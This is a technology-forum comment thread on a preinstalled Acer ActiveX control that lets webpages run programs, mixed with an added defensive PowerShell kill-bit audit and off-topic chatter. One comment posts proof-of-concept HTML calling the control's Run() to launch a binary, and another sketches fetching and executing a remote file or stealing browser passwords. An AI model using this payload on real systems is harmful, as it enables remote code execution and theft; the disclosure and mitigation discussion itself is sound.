Acer May Be Bugging Computers
tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"
Aren't we a little late on this story? (Score:0, Informative)
2006-11-19 - Public Release.
Re:Phew! (Score:3, Informative)
present on Aspire 1690 (Score:3, Informative)
Re:Phew! (Score:4, Informative)
I don't know about SONY, but in my experience, HP are more generous than most in terms of disks included with their PCs.
Re:Phew! (Score:1, Informative)
Safe (Score:2, Informative)
Checked mine, it's present :( Anyone know if it's safe to make that file and its registry entry 'disappear'?
Sure, just go get the Mepis Patch [mepis.org]. This will end all of your ActiveX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.
Really, do you think eliminating this one control will make your computer safe? Chances are there are copies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmond before anyone else gets it.
Re:to those of us uneducated (Score:5, Informative)
Re:So can this be neutralized? (Score:3, Informative)
Re:to those of us uneducated (Score:4, Informative)
of script in a web page. Now I can possibly own most Acer laptops visiting that page.
The script could do something like this
ftp somehost
ftp get somefile
execute somefile
Bingo I own your laptop.
Or say I just ftp your firefox data so I can grab your history, passwords etc.
Re:present on Aspire 1690 (Score:5, Informative)
Go to Start > Run and type:
regsvr32 -u lunchapp.ocx
(-u for uninstall)
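Added example, not part of the thread or of any commenter's post: a PowerShell audit that finds COM classes served by the lunchapp.ocx file named above, reports whether each is registered as safe for scripting, and optionally sets the Internet Explorer kill bit so the class cannot be instantiated even if the file is re-registered. The kill bit, the `-SetKillBit` switch and the parameter names are assumptions introduced here; the thread itself only mentions unregistering with regsvr32.

```powershell
# Added example (not from the thread). Use an elevated prompt for -SetKillBit.
param(
    [string]$FileName = 'lunchapp.ocx',  # control file named in the thread
    [switch]$SetKillBit                  # hypothetical switch: also write the kill bit
)

# CATID_SafeForScripting: a control listing this category is scriptable from any page.
# A control can also claim safety at run time via IObjectSafety; the registry does not show that.
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C4A34}'
$KillBit = 0x400  # "Compatibility Flags" bit that stops IE instantiating the class

# Native registry view, plus the 32-bit view that exists on 64-bit Windows.
$views = @(
    @{ Clsid  = 'Registry::HKEY_CLASSES_ROOT\CLSID'
       Compat = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Clsid  = 'Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID'
       Compat = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)

foreach ($view in $views) {
    if (-not (Test-Path -LiteralPath $view.Clsid)) { continue }
    foreach ($key in Get-ChildItem -LiteralPath $view.Clsid -ErrorAction SilentlyContinue) {
        $clsid   = $key.PSChildName
        $srvPath = "$($view.Clsid)\$clsid\InprocServer32"
        $server  = (Get-ItemProperty -LiteralPath $srvPath -ErrorAction SilentlyContinue).'(default)'
        if ($server -notlike "*$FileName*") { continue }   # also skips classes with no server

        $compatKey = "$($view.Compat)\$clsid"
        if ($SetKillBit) {
            # Create the key only if missing, then OR the kill bit into any existing flags.
            if (-not (Test-Path -LiteralPath $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }
            $old = (Get-ItemProperty -LiteralPath $compatKey).'Compatibility Flags'
            Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
                -Value ([int]$old -bor $KillBit) -Type DWord
        }
        $flags  = (Get-ItemProperty -LiteralPath $compatKey -ErrorAction SilentlyContinue).'Compatibility Flags'
        $catKey = "$($view.Clsid)\$clsid\Implemented Categories\$SafeForScripting"

        [pscustomobject]@{
            Clsid            = $clsid
            Server           = $server
            SafeForScripting = (Test-Path -LiteralPath $catKey)
            KillBitSet       = [bool]([int]$flags -band $KillBit)
        }
    }
}
```

Run without switches it only reports; an empty result means no class on the machine is served by that file.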
Uhh, there already IS an exploit... (Score:5, Informative)
But as you can run ANY Windows binary with any command line (at least according to the article), actual exploitation is trivial.
Late again! (Score:5, Informative)
Re:And now that it's publicized... (Score:5, Informative)
Re:Phew! (Score:4, Informative)
Re:Phew! (Score:1, Informative)
Re:So can this be neutralized? (Score:3, Informative)
Re:to those of us uneducated (Score:3, Informative)
@mozilla.org/process/util;1 (Score:4, Informative)
Re:Phew! (Score:5, Informative)
I recently bought a laptop with Ubuntu pre-installed from The Linux Store [thelinuxstore.ca], which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.
Re:I'm not impressed with this IE7 "improvement" (Score:3, Informative)
The hatred towards ActiveX is largely unfounded. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins?
The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.
IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.
(of course there's the question: should it, but apparently due to jerks that preinstall crap on laptops, yea..)
Re:Phew! (Score:4, Informative)
$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.
Re:to those of us uneducated (Score:2, Informative)
Re:Wow (Score:2, Informative)
And actually the lawsuit for spilt coffee and a million bucks entailed the coffee being so hot it melted the cup where the lid fastened to it, causing the spill, after the company had been informed of the issue repeatedly and refused to do anything about it. She was only asking for medical bills and the jury added to it. So yes, in a way, I guess this kind of relates.
This type of stuff shouldn't be able to happen after how many exploits causing malicious harm to computers. I guess the solution might be for people to stop thinking they need to upgrade or replace their system whenever their computers start acting "worn out" and "slow". If someone on the supply end stops making a buck from every replacement, they might be more concerned with stopping them from breaking.
Re:It's an appendix. (Score:3, Informative)
Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.
That's BS (Score:4, Informative)
All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.
As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..
Don't know about HP, but have handled enough Sony laptops
Re:to those of us uneducated (Score:5, Informative)
I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why?
Re:present on Aspire 1690 (Score:2, Informative)
I'm not sure I'd want to create a page to do it tho, even with full permission from the user...
Re:Wow (Score:2, Informative)
Who's talking about an exploit? I can get people "infected" with XPI the same way people get "infected" by clicking "Yes" on that annoying ActiveX install dialog. It's much easier than trying to find an exploit. But we're drifting here - the issue is a PC vendor pre-installing something on my box. That's even easier, because it doesn't require user intervention!
but there are a number of things to prevent you from actually getting it installed.
Like what, a badly designed whitelist and a dialog where you have to click "No"? And you figure that the same people who used to click "Yes" on IE will click on "No" in Firefox, correct?
Until then, you're full of hot air.
I think you're taking this too personally. Social engineering and stupidity are far more profitable for spammers and scammers than any exploit Microsoft could ever dream of.
Re:present on Aspire 1690 (Score:4, Informative)
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx")
?
Test/exploit code (Score:4, Informative)
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>
Re:Phew! (Score:3, Informative)
I concur. I'm on my HP laptop right now, which is about 20 months old. It came with only one partition, so I had to format the entire thing when I got it to repartition it--I know I could have probably used something like Partition Magic, but I'm cheap and I wanted to uninstall all the cruft, like the Sonic garbage.
The upside is that it did come with a clean* (*HP OEM) Windows XP disk. Even though it was OEM, it gave me the option to keep most of the useless HP software off.
Beyond that, no problems yet. So I'm relatively pleased with HP for once.
Re:Phew! (Score:3, Informative)
Re:present on Aspire 1690 (Score:3, Informative)
Re:Phew! (Score:2, Informative)
It dates back to the Norman invasion of England; pork and beef are the Norman (French) words for those animals (porc and boeuf).
Same reason why we have redundant words like big/large.
Re:Phew! (Score:2, Informative)
On the other hand, if you walked into a restaurant and ordered 'Pig', you might get bacon, ham, or pork. Perhaps even a pork medallion wrapped in a strip of sweet, sweet bacon.
The variety of the animal available for consumption helps shape the ordering process. At least that's all I've got.
Question: is this another Acer backdoor? (Score:4, Informative)
P.S.: the article's backdoor was also present on my system. Those bastards...
Re:Phew! (Score:3, Informative)
It dates back to the Norman invasion (no, not Spiney, but 1066). The (primarily Norman French) aristocracy called food by the French words -- boeuf, jambon (hence ham), etc. The stuff the peasants ate, or that nobody ate (e.g. horse), wasn't.
BTW, the word "poultry" is similar to the French word for chicken -- poulet.
Re:Question: is this another Acer backdoor? (Score:2, Informative)